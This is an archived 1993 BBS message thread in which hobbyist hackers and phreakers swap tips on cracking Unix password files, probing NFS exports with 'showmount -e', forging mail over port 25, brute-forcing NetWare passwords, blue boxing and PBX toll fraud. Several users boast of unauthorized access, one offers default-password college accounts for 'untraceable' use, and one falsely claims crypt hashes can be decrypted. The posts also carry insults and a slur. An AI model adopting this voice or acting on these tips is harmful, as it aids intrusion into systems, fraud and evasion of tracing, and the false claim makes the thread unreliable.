decrypting! That's just encryppting a dictionary and comparing to an encrypted list! Not the same thing. If you could decrypt a passwd, you could get each and every single passwd on the system. Good luck with decryption...:) JasonLee From cosmos@yabbs Mon Oct 25 05:38:44 1993 From: cosmos@yabbs To: Intruder@yabbs Subject: re: Date: Mon Oct 25 05:38:44 1993, you are just so kewl. Notice the header of this message base....HACK. Not WaReZ...but seriously, Amiga and C64 warez groupies always have their shit together. PAL to NTSC- fuck, I am just so impressed. Enjoy your K-RaD 3lit3 k0deZ kiddies. Cosmos From iceman@yabbs Mon Oct 25 13:54:12 1993 From: iceman@yabbs To: Intruder@yabbs Subject: Sigh Date: Mon Oct 25 13:54:12 1993 Are you really as stupid as you sound? You cannot decrypt a crypt() result since it's a 1 way hash. You can brute force them with a cracker and a dictionary, this is no doubt what he did. It's a widely known fact, and your not the first to consider it. iceman [GnUL0D!!]] From cosmos@yabbs Mon Oct 25 14:33:22 1993 From: cosmos@yabbs To: jasonlee@yabbs Subject: re: Pword cracker locations... Date: Mon Oct 25 14:33:22 1993 Good one....I love it! :) OR you can ask on,, and they always jump at the chance to help out... Cosmos From cosmos@yabbs Mon Oct 25 14:35:37 1993 From: cosmos@yabbs To: iceman@yabbs Subject: re: Sigh Date: Mon Oct 25 14:35:37 1993 Probably. Well, actually he posesses the skills to login and post, so he cant be all that bad. Actually, I think it is great that they are letting Jerry's Kids logon and post these days. Cosmos From pharmer@yabbs Mon Oct 25 15:52:35 1993 From: pharmer@yabbs To: phragger@yabbs Subject: re: pword files Date: Mon Oct 25 15:52:35 1993 well, I found a copy of cracker jack in wuarchive, in the msdos uploads section this summer, but I'm sure that it is gone now. Most decent h/p boards should have a copy of one of them, cracker jack is the fastest I've seen so far, the latest version I have seen is 1.4. -pharmer From xenon@yabbs Mon Oct 25 16:37:59 1993 From: xenon@yabbs To: cosmos@yabbs Subject: re: Sigh Date: Mon Oct 25 16:37:59 1993 i like the dcc idea...ill volenteer to send it ;)... From feralkid@yabbs Mon Oct 25 17:33:44 1993 From: feralkid@yabbs To: all@yabbs Subject: decrypt passwd Date: Mon Oct 25 17:33:44 1993 Actually, there is a program out here on the Internet called the Crypt Breaker's Workshop (or someting to that effect). Anyway, this was written years ago by the senior Morris (Robert Morris father, who is a top researcher for NSA). He proved that you arew able to decrypt the one-way hash of the crypt program. You can find this program at a good archive near you... Feral Kid From Intruder@yabbs Mon Oct 25 19:04:28 1993 From: Intruder@yabbs To: Kryptic@yabbs Subject: re: oasswd Date: Mon Oct 25 19:04:28 1993 Yo! Well thanks for the info !!! i know like sysadm daemon and all those account with higher priv. have that!!! oh well no chance to hack those snif !!! Intruder/MYTH+EMPIRE is outta here!!! From Intruder@yabbs Mon Oct 25 19:12:13 1993 From: Intruder@yabbs To: iceman@yabbs Subject: re: Sigh Date: Mon Oct 25 19:12:13 1993 Hmm I never say that the program really encrypt or deencrypt it find the pw i know that hehehe, but the moethod it use i really dunno! i just know that he cracked 26 user account there! and alot of pw were not find himself that his for sure!!! But one my friend good in mathematics stuff tell me some routine of deencryptiuon he cracked and it is sometime Mathematicalk operation! so if the passw have been encrypt that way it is possible to the opposite formula! i can ask my friend for soem formula if yah want! Intruder/MYTH+EMPIRE is outta here!!! From Green@yabbs Mon Oct 25 20:25:40 1993 From: Green@yabbs To: cosmos@yabbs Subject: re: learning Date: Mon Oct 25 20:25:40 1993 Heh. showmount -e for a good time (the other day they had an open export problem, no shit) green From octal@yabbs Mon Oct 25 23:38:38 1993 From: octal@yabbs To: all@yabbs Subject: re: code breakers workshop Date: Mon Oct 25 23:38:38 1993 ftp to , look for cbw.tar.Z. It' s a pretty old program, for the best crypto ftp site(IMHO), ftp to, it's a killer site. From binkley@yabbs Tue Oct 26 00:10:12 1993 From: binkley@yabbs To: all@yabbs Subject: Date: Tue Oct 26 00:10:12 1993 Has anybody figured out what area code that out dial serves?? it called a 615 number, I tried 310, and 708, but could tell if the BBS's were busy, or if it wasn't allow the dialing procedure... Binkley From pharmer@yabbs Tue Oct 26 00:45:17 1993 From: pharmer@yabbs To: binkley@yabbs Subject: re: Date: Tue Oct 26 00:45:17 1993 I would take a quess that it is 416, I looked up the # for utoronot physics dept. and it was a 416#. From cosmos@yabbs Tue Oct 26 06:22:12 1993 From: cosmos@yabbs To: Intruder@yabbs Subject: re: oasswd Date: Tue Oct 26 06:22:12 1993 Okay, I have to say the following, your post was just to pathetic. First off, you dont know shit about what you are talking about. If to you hacking consists of running a passwd file through Killer Cracker then you might as well stop now, you have no clue and will never achieve anything. Use a cracker to gain one or two accounts. The real hack is the method in which you obtain a higher access...but you would not know about that whould you...(wait, gotta check my k-rad t-phile!) you even know what perms you should look for once inside?? What the /dev/kmem file can accomplish, the proper rwx attributes for ALL system and user files, what to do if they are not right...etc....etc...etc... No, I think not. And cut the MYTH+EMPIRE shit, lamer warez crap has no place in a forum for hack discussion. Cosmos From cosmos@yabbs Tue Oct 26 06:24:09 1993 From: cosmos@yabbs To: Intruder@yabbs Subject: re: Date: Tue Oct 26 06:24:09 1993 Oh, c0deZ....excuse me. Same thing, lame as shit. Oh, and where in the goddamn hell did you learn to write?? Your post has the literary skills of a three year old. Cosmos From cosmos@yabbs Tue Oct 26 06:24:37 1993 From: cosmos@yabbs To: Green@yabbs Subject: re: learning Date: Tue Oct 26 06:24:37 1993 *grin* Cosmos From wonko@yabbs Tue Oct 26 13:04:40 1993 From: wonko@yabbs To: octal@yabbs Subject: re: code breakers workshop Date: Tue Oct 26 13:04:40 1993 another place to look is a penn state computer. /pub/src i got 4.7 Kbytes/s and we only have a 56Kbyte line to this machine. the line from this machine to you is a T3, big fucking trunk line. you should get nice speeds. l8r, -wonko From Intruder@yabbs Tue Oct 26 21:05:34 1993 From: Intruder@yabbs To: binkley@yabbs Subject: re: Date: Tue Oct 26 21:05:34 1993 Yo! Well pacx ^ it is in toronto and it allow you to call locally there!!! the only prolbme wiht this Gandalf system is that the delay is too fast and when i try to call some board with v32 or DS it take too much time beofre the connection made and the modem tell me NO MODEM RESPONSE or something like that! if you call a board working with a HST or a 2400 you will be fine!!! i mange to call Beyond Akira that it!!! Intruder/MYTH+EMPIRE is outta here!!! From cosmos@yabbs Tue Oct 26 21:11:40 1993 From: cosmos@yabbs To: Intruder@yabbs Subject: re: Date: Tue Oct 26 21:11:40 1993 Hmmm...maybe set the delay higher...what do you think? Cosmos From Intruder@yabbs Tue Oct 26 21:12:40 1993 From: Intruder@yabbs To: cosmos@yabbs Subject: re: oasswd Date: Tue Oct 26 21:12:40 1993 Hmmm hey you really think i am that stupid??? and that i only having fun in a cking account and PW??? no fucking way!!! what i find interesting is to acces thing i was not permitted by trying all the service doors! or by maybe getting a hibher priv. or prop.! I duno much about priv. on UNIX system since i just start to learn those system a few month ago! ah maybe you are the god on UNIX but maybe i am just starting so cant do everything in 24 hours??? and dont tell me you have start to be the master and the best in 240 hours!!! and btw chek the hacking definition thye are laot of meaning even putting hardware on a none specific machine is consider as a hack! anywa that his my point and 2nd do i stress you with my /... is yes well ill just sign up with nothing to make you feel better happy now? Intruder is outta here!!! From cosmos@yabbs Wed Oct 27 05:47:48 1993 From: cosmos@yabbs To: Intruder@yabbs Subject: re: oasswd Date: Wed Oct 27 05:47:48 1993 Well, after reading through your post several times(I really do want to know where you learned English writing skills), here is a simple reply. 240 hours...maybe. UNIX king....nope. I am just referring to the general feeling after one reads your post, moron. But I do like the fact that you did not sign your last post with a lame group sig. Maybe it's me, but you newbies(admitted of your own accord) seem to have a general lack of initiative. Do you even attmept to visit a library and research UNIX, do you know what a library is?? Where do you live, have you looked at public access alternatives to play with are probably at some university since you have telnet with a UNIX account if you have one. Jesus, learning should be 95% your responsibility and not anyone elses. Take initiative and get off your lazy ass. Ask intelligent and pointed questions aimed at a specific problem, not "Hey, I am new...what do I do??". Is that asking too much?? Cosmos From binkley@yabbs Wed Oct 27 12:32:19 1993 From: binkley@yabbs To: cosmos@yabbs Subject: re: Date: Wed Oct 27 12:32:19 1993 I'm from Maine! I used to call a few 708, and 310 boards, now I can't call long distance... I need some 416 boards to call!!!! HELP ME!!! From deprogra@yabbs Wed Oct 27 16:17:29 1993 From: deprogra@yabbs To: Intruder@yabbs Subject: re: oasswd Date: Wed Oct 27 16:17:29 1993 Intruder, is english a second language to you? From jmacneil@yabbs Wed Oct 27 17:17:10 1993 From: jmacneil@yabbs To: binkley@yabbs Subject: re: Date: Wed Oct 27 17:17:10 1993 What's the deal w/pacx? All I get is major garbage. I can sort of make out the word "Selection" but thats all I can see. What do I do? How about some 416 numbers too... From jmacneil@yabbs Wed Oct 27 17:29:08 1993 From: jmacneil@yabbs To: all@yabbs Subject: ftp Date: Wed Oct 27 17:29:08 1993 Oh yeah, does anyone know of any Telnet sites which allow FTPing over the net to PCs (ie: Zmodem DLs..)? I only have Telnet access so far. I've picked up a mail address but I still need to find a way to FTP to my PC. Thanks. From Intruder@yabbs Wed Oct 27 19:18:45 1993 From: Intruder@yabbs To: cosmos@yabbs Subject: re: oasswd Date: Wed Oct 27 19:18:45 1993 Yo! Ahhh now we seem to get to a good point now!!! ajh sorry if sometime my english is bad! 1st of all i am not English native as you can probalby see hehehe i am French!!! 2nd i am sometime too fast on the keyz, and dont take time to re-read my msg. i know i should do this but sometime those connection are so slow!!! Well i start to learn thing about unix (yah it is on a university!) i am now trying to get familiar with the "DOS" commands, they are so many of them!!! And start to walk around on internet with the great help of TELNET! and FTP as for the files servers! i have not experiment FSP yet since i will have to install that on my system since it is not there! ah btw i am now looking in the library since the beginning of this week and i find some great book (well i think) so one is about Internet (it is big book with adress and services etc.. it look like an annuary (phone book) it vcost around $30 dunno if it is worth the money! and one very interesting about UNIX it talk about Security on unix systems! i look the book and they reall explain in detail and examples how to bypass security etc.. where to find the files that are use by the systems! they talk about how work the princip of passwd encryption! and much more it cost around $40 (about 400 pagexs!) and i might get a general quick reference book for unix command!!!!! Hmm do you think the 2nd books is really worth the money??? i think so! and it will help me to understand how to get trhu soem stuff! anywa if you have any refz book you suggest me to read ill appreciate! and since you know i am new well good suggestion on what to start! btw my attiude about hacking system is not to destroy anything and i am not intending to be a terrorist! i am looking more into to be a shadow on the system ! so nobody will find me or bother me :-) doing my personal thing hehehe! walking around the netz and getting higher to the top! I am outta here!!! at WARP 10 Engage ... From Intruder@yabbs Wed Oct 27 19:20:53 1993 From: Intruder@yabbs To: deprogra@yabbs Subject: re: oasswd Date: Wed Oct 27 19:20:53 1993 Hmmm heheheh yup!!! i can hide the truth! i am a French Canadian!!! so that why sometime you see some bad english sorry!!! Intruder is outta here!!! From schief@yabbs Wed Oct 27 19:28:08 1993 From: schief@yabbs To: jmacneil@yabbs Subject: re: ftp Date: Wed Oct 27 19:28:08 1993 try (login gopher) or (login gwis) both of these require you to hop around on the net though before you can get any working ftp access. Try jumping over to the University of Trondheim in Norway or DENet in Denmark, both of these work fine for me. I'm in the same boat as you. Sucks, doesn't it? From DrClaw@yabbs Thu Oct 28 00:46:24 1993 From: DrClaw@yabbs To: all@yabbs Subject: login in as uucp Date: Thu Oct 28 00:46:24 1993 Heya all, i just read a message on a local board about login intyo places through from what i know and have read i don't htink this would work to well and even so wyou woulnd't get much privs but i am wondering is it possible to upgrade pirvs on a uucp account? Once you got in that is... thanks Dr Claw From cosmos@yabbs Thu Oct 28 16:10:28 1993 From: cosmos@yabbs To: jasonlee@yabbs Subject: re: oasswd Date: Thu Oct 28 16:10:28 1993 Oh, good point...I didnt mean to try any sensitive stuff on university machines...I meant to learn the UNIX commands and methods. I am currently under investigation by mine as well. I really dont care, they are just upset that I was wandering around. Spoof mail...port 25??? No, not me!!! *grin* Cosmos From xenon@yabbs Thu Oct 28 17:05:30 1993 From: xenon@yabbs To: cosmos@yabbs Subject: re: oasswd Date: Thu Oct 28 17:05:30 1993 lucky me...when i wuz foolin round on my first university UNIX account tryin all sorts of stupid shit, no one said anything...course, they did add a bunch o new security software a little bit ago...damn hackers ;) --> Xenon From DrClaw@yabbs Thu Oct 28 17:42:25 1993 From: DrClaw@yabbs To: all@yabbs Subject: jhu dialout Date: Thu Oct 28 17:42:25 1993 What is the address for the jhu dialout and hyow do i get onto it? Also there is a dialout in Denver colorado area code 303 if anyone wants it mail me at and i will gladly give it to you... hasta Dr Claw From ea@yabbs Thu Oct 28 17:46:44 1993 From: ea@yabbs To: cosmos@yabbs Subject: re: oasswd Date: Thu Oct 28 17:46:44 1993 I think you have everything pretty well thought out, and I agree with you on every account. The one thing that should be realized, of course, is that when you are learning, (the basics, I mean, everyone is learning), you should realize that. The way to learn is to ask, and to talk with other people. If you start without talking intelligently, people will never take you seriously enough to help you learn. If you don't want to learn, or don't have the time to learn, but still like hanging out, this too is okay. I'm not great at everything, and really don't know much at all, (I'm not sure I have the skill that is required), but at least I have respect of those who do have the skill, and I realize where they come from, and where I come from.. The other important point is that unless you gain someone''s trust, and they like you, there is no way in hell that you will learn anything, because, in general, it is just too risky to trust people.. So if you want to leanr, respect those who are further ahead in their field, if you don't want to learn, or don't have the time, that is fine to, but then you have to realize that. I guess that this message should not haave been posted to you, cosmos, since you seem to know all of this, but people reading it should just take it as general advice.... Ea, he whom nothing escapes. (But who has a tendancy to bable on at times) From cosmos@yabbs Thu Oct 28 18:05:39 1993 From: cosmos@yabbs To: xenon@yabbs Subject: re: oasswd Date: Thu Oct 28 18:05:39 1993 Yeah, true. I should point out that this is my first LEGIT account...I had university accounts in 1985-86 as my first. And you could do anyhting.... Cosmos From cosmos@yabbs Thu Oct 28 18:11:59 1993 From: cosmos@yabbs To: ea@yabbs Subject: re: oasswd Date: Thu Oct 28 18:11:59 1993 Yes, your post did have a clear and definate point. Unlike Intruder =who sounds like a three year old retarded fuck. My point is that there is no point to what he posts, just mindless rambling with no semblance of common sense. If one asks a relavant and inteligently phrased question then it merits an intelligent reply...unfortunately I have not seen many yet. Cosmos From xenon@yabbs Thu Oct 28 18:55:43 1993 From: xenon@yabbs To: cosmos@yabbs Subject: re: oasswd Date: Thu Oct 28 18:55:43 1993 this discussion reminds me of the new user questioneer discussion posted earlier. one of the defenses for having one of these rediulous questioneers was to keep users like this intruder fellow away so the" could talk in peace. i wont rehash everything that wuz said cuz its all on disk if ya wanna go back and look. my point is, intruder came on here and wasnt informed enuff in his BSing so that other users could instantly tell that he was a beginner. everyone makes mistakes and the smart ones will learn from their mistakes. inturder received a quick,light, and deserved ride down to earth from the users who bothered to respond. if hes smart, hell keep his mouth shut and learn from the numerous resources on the internet. if hes smart, he will learn from this experiance and his next questions will be phrased in a more humble and intelligent way. Im not sayin that intruder SHOULDNT ask quetions, im sayin that he should do sum learning and research on his own before asking those questions. im not sayin that itll be a quick ride, ive been hacking round on computers fer YEARS and I still dont know shit. if ya really wanna know, ya gotta put a lot of time and effort into it and dont act as if yer gods gift to the hackers. stay cool...chill...and observe. keep yer senses open and digest everything you can... ok, intruder fucked up. thats still no reason fer those questioneers that can reach pages in length. he got his reward fer acting brash...and if it keeps sure hell get more than just a tounge lashing. who knows what hell become in a few years, tho. the "underground" needs to keep its member list growing and those people strong. its gonna be a tough ride, but its sumthin that NEEDS to be done to keep Big Brother out of our lives... stay / Xenon From graph-x@yabbs Thu Oct 28 18:57:51 1993 From: graph-x@yabbs To: Intruder@yabbs Subject: re: Date: Thu Oct 28 18:57:51 1993 can you post the number to byeond Akira ? From graph-x@yabbs Thu Oct 28 18:59:56 1993 From: graph-x@yabbs To: jmacneil@yabbs Subject: re: Date: Thu Oct 28 18:59:56 1993 dude, strip the high bits, then you wont be seeing garbage. From jasonlee@yabbs Thu Oct 28 20:23:42 1993 From: jasonlee@yabbs To: DrClaw@yabbs Subject: re: jhu dialout Date: Thu Oct 28 20:23:42 1993 It no longer works. I don't think it ever did. At least, I never got it to work correctly (dial out). I could give it AT commands, though. Give up on it. Try to find the anonymous JHU telnet. ;) JasonLee From Intruder@yabbs Thu Oct 28 21:13:18 1993 From: Intruder@yabbs To: all@yabbs Subject: ok! Date: Thu Oct 28 21:13:18 1993 Hmm well i just reead through all this mail!!! na di find it very interesting!!! and i am taking your advice seriously!!! soory i fi make some people mad and if i do errors, but you know we are all humans ! well i hope so!!! :-) so now i am learning from my erros!!! Hmm something i ask question they are thing i try but since i had no success and find no documentation well i ask some people that have more knowledge than me to help me out!!! Like i said before i am now trying to getting documents to help me learning!!! coz i want to learn!!! the only thing i will appreciate from you guyz is to give me some suggestion of book of references i can look or read and will teach me and that help me to find my answers so i dont have to ask stupid question to everybodsy!~!! i find a book about security on unix systems and i wonder if it was a good thing to buy $40!!! anywa if any of you have any suggestion to help me to follow the good road and become a sage one!!! thbanks for you comprehension and collaboration! I am outta here!!! From Intruder@yabbs Thu Oct 28 21:17:12 1993 From: Intruder@yabbs To: graph-x@yabbs Subject: hmm Date: Thu Oct 28 21:17:12 1993 Ok the # for Beyond Akjira are 416-461-6702 416-461-9101 416-461-5114 (this one you will get no problem to connect it!) The only problem i got while calling there is that the Gandalf Modem have a too low delay for connection so when calling a board with a Dual Standard it take too much toime to get the connection if you find any way to change setup of the delay please let me know!!! Im outta here!!! From bruce@yabbs Thu Oct 28 21:22:47 1993 From: bruce@yabbs To: puck@yabbs Subject: BATMAN Date: Thu Oct 28 21:22:47 1993 iT HAS BEEN HELL GETING ONTO THIS SYSTEM my computer is double entering everyth time I hit the dam button. no one is out in computer land I'm sad! From bruce@yabbs Thu Oct 28 21:23:44 1993 From: bruce@yabbs To: BATMAN@yabbs Subject: Hi Date: Thu Oct 28 21:23:44 1993 it is I your other half what is up sexy? From DrClaw@yabbs Fri Oct 29 00:35:39 1993 From: DrClaw@yabbs To: all@yabbs Subject: 303 dialout Date: Fri Oct 29 00:35:39 1993 heya ll, thos i gave the 303 dialout address to it is now asking for passwords and accounts and i have no idea how to pass these...up until last week ther was no passwords and stuff.... who knows? sorry about that.... dr_claw From cosmos@yabbs Fri Oct 29 03:19:04 1993 From: cosmos@yabbs To: xenon@yabbs Subject: re: oasswd Date: Fri Oct 29 03:19:04 1993 Good point. As for the underground, I wouldnt know. I am an individualist; I belong to no organizations. No groups, nada. I do things my way and for myself. Groups are the first step toward Big Brother... Read "Self-Reliance" by Ralph Waldo Emerson...sorry intruder, it doesnt have pictures. Cosmos From phragger@yabbs Fri Oct 29 09:03:32 1993 From: phragger@yabbs To: Intruder@yabbs Subject: re: oasswd Date: Fri Oct 29 09:03:32 1993 Just a note here. GOOD unix books are definelty "The Design of the UNIX Operating System" and "Design and implementation of the BSD 4.3". Unix network programmin is also supposed to be quite good, they mainly deal w/ kernel programming and how the system works. Ad for unix security books, the ones I`ve gone through are quite pathetic , they simply tell about old buhgs sometimes patched, general principles , setuids, and some scripts one might create. (worse than Cert, almost, but not quite) From phragger@yabbs Fri Oct 29 09:09:28 1993 From: phragger@yabbs To: DrClaw@yabbs Subject: re: login in as uucp Date: Fri Oct 29 09:09:28 1993 it`as gotta be a pretty old system for uucp accounts to be "loginable" and to even jhave shell on the system. What you might look at is that uucp ermissions are screwed or uux permiussions are screwed, bnut I`d doubt that you gould get much higher access till root happens to run one of those programs. (which I believe cron might do, IU do not know). Bides UUCP is dying, NNTP,SMTP and ftp are taking ovI know there are quite a lot of UUCP only sites on the net, but it wouldn't surprise me that some systems might have disabled UUCP access from the outside completly (never seen it anywhere though). I`d be interested in any contradictoruy information (esp3cialluy on the first statements :-). From phragger@yabbs Fri Oct 29 09:17:09 1993 From: phragger@yabbs To: Intruder@yabbs Subject: re: ok! Date: Fri Oct 29 09:17:09 1993 Just to add something here, to get comfortable w/ unix, I`d seriously suggest just downloading all the manpages one can find and read them and play around / them, it`ll certainly teach you a lot (humility among other things :-) From horus@yabbs Fri Oct 29 13:06:19 1993 From: horus@yabbs To: DrClaw@yabbs Subject: re: 303 dialout Date: Fri Oct 29 13:06:19 1993 why don't you use pgp encrpyt it and e-mail it to the guy. you could use his handle as the key. Horus Min /\o/\ From binkley@yabbs Fri Oct 29 23:38:14 1993 From: binkley@yabbs To: jmacneil@yabbs Subject: re: Date: Fri Oct 29 23:38:14 1993 Well, post a few 416 BBS's then man! You need vti925 emulation... aokln Binkley From Screamin@yabbs Sat Oct 30 06:13:09 1993 From: Screamin@yabbs To: all@yabbs Subject: Date: Sat Oct 30 06:13:09 1993 Just a quick hello from Australia. Wondering if youu guys could list some 1-800 carriers for me. Don't care what they are, just as long as they'll pickup. ta Screaming Mutant From Intruder@yabbs Sat Oct 30 11:09:56 1993 From: Intruder@yabbs To: phragger@yabbs Subject: re: oasswd Date: Sat Oct 30 11:09:56 1993 Hmm!!! Thanks! ill tyr to find one of this book, i am sure i can one hehe especially the place i go to get book is quite huge and have alot of book about UNIX!!! hmm well myabe the unix security probably relating bugs fixed! hmm but i look carefully and it seem they explain asll the security systems how it works! they dont necessary tell you what to do to bypass it it can tell you soem good tips!!! ill maybe buy both :-)( They should have some UNIX machine at college, they are on VMS! and they are not connected to any external things but i can get all the book i want for that system i know the ops hehehe! Intruder is outta here!!! From Intruder@yabbs Sat Oct 30 11:12:44 1993 From: Intruder@yabbs To: phragger@yabbs Subject: re: ok! Date: Sat Oct 30 11:12:44 1993 Ah! yah that his a good ideas to get the manual online form unix and to buffere it!!! hehe it will be long but very usefull!!! insted of going to buy a book of around 50$ and more!!! Yah i alread look there when i look for commands and how to do some thing! but soemthing that make me mad coz on the system i am connected dont have all the stuff installed and something it tell me Unknown command!!! Intruder is outta here!!! From rlion@yabbs Sat Oct 30 21:42:47 1993 From: rlion@yabbs To: all@yabbs Subject: it seems Date: Sat Oct 30 21:42:47 1993 that all the boards near me (va/dc/md) are gone, at least all the good ones. pentavia's down, solsbury hill is semi-down and reclamtion is gone. it really kind of sucks. *sigh* rl From bigK@yabbs Sat Oct 30 22:58:22 1993 From: bigK@yabbs To: all@yabbs Subject: New Date: Sat Oct 30 22:58:22 1993 hello, I'm new to the nets.ahem...anyway I was wondering what good are gophers?? To The Point I Say.... bigK From =pc=@yabbs Sun Oct 31 00:06:04 1993 From: =pc=@yabbs To: all@yabbs Subject: H/P/C/A bbs in OZ Date: Sun Oct 31 00:06:04 1993 hIya all, is the distribution of H/P/C/A/ files legal?if so what are the conditions and/or regulations/. =PC= /keep on phreaking/ From rlion@yabbs Sun Oct 31 00:31:11 1993 From: rlion@yabbs To: all@yabbs Subject: re: New Date: Sun Oct 31 00:31:11 1993 gophers make it possible to have access to a lot of information and sometimes other sites on the net annoymously and free. nlah rl From rlion@yabbs Sun Oct 31 00:32:37 1993 From: rlion@yabbs To: =pc=@yabbs Subject: re: H/P/C/A bbs in OZ Date: Sun Oct 31 00:32:37 1993 check the 1st ammendemnt. of course they are legal. there are no regulations about the spread of information. of coure, i wouldn't hand it to a FED and say, "hear read this"? and i'd put at the top this is for your information and i don't mean it to be anyway illegal, just to be safe, but technically speeking, those kinds of 'files' belong under 'freedom of the press' rk rl From Screamin@yabbs Sun Oct 31 00:33:10 1993 From: Screamin@yabbs To: cosmos@yabbs Subject: re: Date: Sun Oct 31 00:33:10 1993 I just need the 800 to test a local dialout on some uni... I'm connected through a couple of unis so ANI isn't much of a threat.. From pyro@yabbs Mon Nov 1 13:16:11 1993 From: pyro@yabbs To: all@yabbs Subject: Stuff... Date: Mon Nov 1 13:16:11 1993 To the person i was chatting with the other nite about picking up some stuff via FTP: Sorry, I got so busy I forgot to get it on to the site. If yo. If you still have the info for logging on please try again. I will leave the stuff on there for awhile. And no, everyone, its not illegal. So there... Why do people insist on posting stupid thing like that last post? Don't they realize this is apublic BBS and no one gives a damn about giving them damn codes or shit like that? Oh well. What is this world coming to. -Pyro -Oldtimers, Inc. From moth@yabbs Tue Nov 2 05:21:10 1993 From: moth@yabbs To: greywolf@yabbs Subject: Call overseas Date: Tue Nov 2 05:21:10 1993 I dont know what GOD is but I have got a suggestion fo International calls. I know blue boxing is very much dead but maybe you will get lucky on international line. You can always call a toll-free number in the US connecting you to a operator in a foreign country like Japan or Singapore. From there you might have some luck with a blue box. By the way what is GOD ? Cheers Moth. From binkley@yabbs Tue Nov 2 11:17:04 1993 From: binkley@yabbs To: cosmos@yabbs Subject: all Date: Tue Nov 2 11:17:04 1993 th16-461- 1-6702/9101/5114 are no good, I dialed to 2 of them, and got timeouts, and I coneee that's connected to 1 and it said 9600 or higher only... From swami@yabbs Tue Nov 2 17:38:10 1993 From: swami@yabbs To: all@yabbs Subject: PBX hacking Date: Tue Nov 2 17:38:10 1993 I need a decent PBX hacker. I tried to get code thief to do what I want, but it's not really designed to hack PBXs. Don't want to reinvent the wheel,, someone point me in the right direction? swami From xenon@yabbs Tue Nov 2 19:03:48 1993 From: xenon@yabbs To: moth@yabbs Subject: re: Call overseas Date: Tue Nov 2 19:03:48 1993 GOD stands fer Global OutDial... try blue boxing from home...its fun! From jasonlee@yabbs Tue Nov 2 19:07:15 1993 From: jasonlee@yabbs To: swami@yabbs Subject: re: PBX hacking Date: Tue Nov 2 19:07:15 1993 Hmmmm...I don't have a PBX hacker, but you just reminded me of how much fun our PBX at school is. Most of our LD phone calls were made on the school's bill. Luckily, I was somehow more secret than my friends, cuz they all got caught for doing it, but not me. Well, they bugged me about one call, one which I didn't actually make! So, I just told them I knew nothing, and got off, wow that was a waste of typing... JasonLee From wonko@yabbs Tue Nov 2 20:52:57 1993 From: wonko@yabbs To: all@yabbs Subject: SunOS UNIX Date: Tue Nov 2 20:52:57 1993 anyone know any backdoors/default logins/etc. for SunOS UNIX (version unknown) thanks, -wonko From *@yabbs Tue Nov 2 21:53:22 1993 From: *@yabbs To: all@yabbs Subject: VMS Date: Tue Nov 2 21:53:22 1993 Hi all I'm fairly new at this but say hypothetically of course that the local u had a vax running vms 5.5-2. Now again hypothetically I wanted to get into it but I only knew one back door that will get me into a very limited say I wanted to get a really nice account on htis system i.e. full user privs...can anybody help me get started on how to deal with this purely hypothetical situation??? From DrClaw@yabbs Tue Nov 2 23:57:55 1993 From: DrClaw@yabbs To: all@yabbs Subject: password file Date: Tue Nov 2 23:57:55 1993 anyone know what the name fof netwares password file is? I really need to know... this... thanks Dr_claw From cosmos@yabbs Wed Nov 3 05:28:45 1993 From: cosmos@yabbs To: swami@yabbs Subject: re: PBX hacking Date: Wed Nov 3 05:28:45 1993 *grin* Cosmos From phragger@yabbs Wed Nov 3 12:39:18 1993 From: phragger@yabbs To: moth@yabbs Subject: re: Call overseas Date: Wed Nov 3 12:39:18 1993 Try Honolulu, might give you a lousy connection, but it oughta work. GOD = Global Out Dial From johndeer@yabbs Wed Nov 3 19:52:57 1993 From: johndeer@yabbs To: all@yabbs Subject: re: Call overseas Date: Wed Nov 3 19:52:57 1993 rlion: so what do you call then in dc/md/va? intruder: allez-vous un bibliotheque. jasonlee: so the site you're on logs the telnets to port 25? dr. claw: it's stored in Netware's bindery. it's encrypted. use novell's VERIFY PASSWORD command to query the bindery, it can be brute-forced this way. john Deere [sorry abouyt all the spaces, my upload skrewed up] From mindstrm@yabbs Wed Nov 3 20:22:58 1993 From: mindstrm@yabbs To: all@yabbs Subject: re: SunOS UNIX Date: Wed Nov 3 20:22:58 1993 You know... It really surprises me to think that people will come right out and ask for stuff like this (read: security holes...). If you don't konw any, well, I just don't think a public posting is a good idea. People who DO know about such things tend NOT to reply to public anonymous postings... It's my imprtession that this is NOT an Elite Hacker board... which is the only place you'll find this kind of stuff... Then, of course, I could just be drunk and rambling ... +The Glory Days Are Over+ -mindstrm From jasonlee@yabbs Wed Nov 3 21:33:14 1993 From: jasonlee@yabbs To: johndeer@yabbs Subject: re: Call overseas Date: Wed Nov 3 21:33:14 1993 Don't most places log every telnet? Actually, I've sent mail (fake) that way, causing some problems, but they didn't figure out who it was. I guess their tracing abilities aren't too good. It's still better to just do it from some anon source. I guess this was what you were asking. JasonLee From xenon@yabbs Wed Nov 3 21:43:35 1993 From: xenon@yabbs To: jasonlee@yabbs Subject: re: Call overseas Date: Wed Nov 3 21:43:35 1993 yer talkin bout port 25? thats NOT a secure way to send fake mail...take jl's advice and use an anon service...only REAL secure way, tho, is not to use yer own account, but... --> Xenon From cosmos@yabbs Thu Nov 4 06:36:05 1993 From: cosmos@yabbs To: mindstrm@yabbs Subject: re: SunOS UNIX Date: Thu Nov 4 06:36:05 1993 Good point. Yes, the good days are over. However, I try to stay away from the elite fuckers as well. Nothing but attitude and pompous little teenagers. The real hard core stuff is passed in small circles. Cosmos From cosmos@yabbs Thu Nov 4 06:38:08 1993 From: cosmos@yabbs To: jasonlee@yabbs Subject: re: Call overseas Date: Thu Nov 4 06:38:08 1993 Yeah, port 25 is the sendmail port. However, any decent sysadmin can trace you through the headers. A nice thing to do is to telnet into a VM system via port 25 and issue a fake domain during HELO. VM takes anything you give it...most modern UNIX sendmails will grab your address anyway and stick it in the header... Cosmos From carsenio@yabbs Thu Nov 4 16:56:58 1993 From: carsenio@yabbs To: johndeer@yabbs Subject: re: Call overseas Date: Thu Nov 4 16:56:58 1993 quick correction john.. pardon my perfectionism, but it's: "allez-vous a une bibliotheque" not "allez-vous un bibliotheque" call me petty. =-) luego... -carsenio From Beetle@yabbs Thu Nov 4 20:18:34 1993 From: Beetle@yabbs To: vapor@yabbs Subject: re: 40hex Date: Thu Nov 4 20:18:34 1993 You asked about 40-hex, and others have been wanting scanners.... If you don't mind calling out (The system doesn't have an Internet connection) you can get all of the above from CoI at 818-447-2667... large collection of H/P Utils, Viruses, and Info... From binkley@yabbs Fri Nov 5 01:59:33 1993 From: binkley@yabbs To: all@yabbs Subject: accounts Date: Fri Nov 5 01:59:33 1993 I have some accounts people can use for un-traceable usage. There is a system I'm on, a college system, but the security is AAWFUL! so, about 1/2 half of the accounts on there have never been touched, they were set up for people who never used it, and the passwords come default, the same as the login....!!! E-mail me here, or at Don't mail me at cause that's the system, and I don't want any info about it on it under my name.... Binkley From 